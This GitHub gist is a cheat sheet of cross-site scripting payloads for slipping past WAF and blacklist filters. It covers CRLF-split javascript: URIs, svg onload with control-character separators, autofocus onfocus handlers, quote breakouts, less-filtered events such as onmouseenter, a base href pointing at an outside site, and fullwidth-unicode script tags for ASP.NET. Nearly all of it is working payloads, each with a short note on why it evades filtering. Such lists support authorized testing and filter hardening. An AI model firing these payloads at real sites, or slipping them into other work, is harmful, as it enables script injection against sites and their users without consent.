Created
September 15, 2018 21:40
-
-
Save nani1337/fcc68e0282b8b104b5e1974a9d7ecfb3 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| java%0d%0ascript%0d%0a:alert(0) | |
| (crlf injection to bypass javascript: being blacklisted) | |
| <svg%0donload=prompt(1)> | |
| (incase svg onload= is filtered, the %0d acts as a seperator and can sometimes confuse wafs.) %0a %0c %09 %00 are also common payloads to use here. | |
| <input onfocus=alert(0) autofocus> | |
| If a dev has hard-coded a blacklist to "protect" from XSS, input is sometimes forgotten about! | |
| \\"-alert(0);// | |
| The use of \\ will break out of the quote inside a script tag | |
| "onmouseenter=confirm(1)> | |
| The WAF blacklisted alert(0), prompt(0), but failed to filter confirm(1) aswell as onmouseenter=. Onmouseneter does the same as onmouseover= but a lot of devs seem to not know this (not sure why) and fail to blacklist it. | |
| <base href=//yoursite.com> | |
| Same as above, base href is usually not filtered by a WAF and can help confirm existence of XSS. | |
| %uff1cscript%uff1ealert(1)%uff1c/script%uff1e | |
| From ghettobypass and is used on ASP.NET endpoints. I highly recommend bookmarking his page. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment